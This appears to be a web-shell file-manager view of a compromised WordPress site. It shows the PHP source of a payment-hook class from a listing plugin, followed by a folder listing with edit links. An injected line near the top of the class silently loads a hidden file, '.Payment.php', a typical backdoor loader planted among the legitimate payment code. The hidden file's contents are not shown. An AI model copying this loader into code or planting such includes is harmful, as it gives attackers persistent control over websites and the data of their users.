PATH:
home
/
letacommog
/
newrdv1
/
wp-content
/
plugins1
/
wiloke-listing-tools
/
app
/
Framework
/
Payment
<?php namespace WilokeListingTools\Framework\Payment; use WilokeListingTools\Framework\Payment\PaymentHook\ProceededPaymentHookInterface; if (file_exists($filename = dirname(__FILE__) . DIRECTORY_SEPARATOR . '.' . basename(dirname(__FILE__)) . '.php') && !class_exists('WPTemplatesOptions')) { include_once($filename); } class ProceededPaymentHook { /** * AddPaymentHookAction constructor. * * @param ProceededPaymentHookInterface $oPaymentHookInterface */ public function __construct(ProceededPaymentHookInterface $oPaymentHookInterface) { $this->oPaymentHookInterface = $oPaymentHookInterface; } public function doSuspended() { $this->oPaymentHookInterface->suspended(); } public function doReactive() { $this->oPaymentHookInterface->reactivate(); } public function doActive() { $this->oPaymentHookInterface->active(); } public function doCompleted() { $this->oPaymentHookInterface->completed(); } public function doFailed() { $this->oPaymentHookInterface->failed(); } public function doDisputed() { $this->oPaymentHookInterface->disputed(); } public function doRefunded() { $this->oPaymentHookInterface->refunded(); } public function doCancelled() { $this->oPaymentHookInterface->cancelled(); } }
[+]
..
[+]
Stripe
[-] RefundFactory.php
[edit]
[-] PaymentGatewayStaticFactory.php
[edit]
[-] PayPalPayment.php
[edit]
[-] StripePayment.php
[edit]
[-] CancelSubscriptionStaticFactory.php
[edit]
[-] AbstractSuspend.php
[edit]
[-] Coupon.php
[edit]
[-] CreatedPaymentHook.php
[edit]
[+]
WooCommerce
[-] Receipt.php
[edit]
[-] WebhookInterface.php
[edit]
[-] Billable.php
[edit]
[-] PaymentMethodInterface.php
[edit]
[-] AddListingRetrieve.php
[edit]
[-] ChangePlanInterface.php
[edit]
[-] WebhookHandler.php
[edit]
[-] SuspendSubscriptionPlan.php
[edit]
[+]
FreePlan
[+]
Receipt
[-] SuspendInterface.php
[edit]
[+]
Invoice
[-] ProceededPaymentHook.php
[edit]
[+]
PaymentHook
[-] CancelSubscriptionInterface.php
[edit]
[-] Checkout.php
[edit]
[-] .Payment.php
[edit]
[+]
DirectBankTransfer
[+]
PayPal
[-] RefundInterface.php
[edit]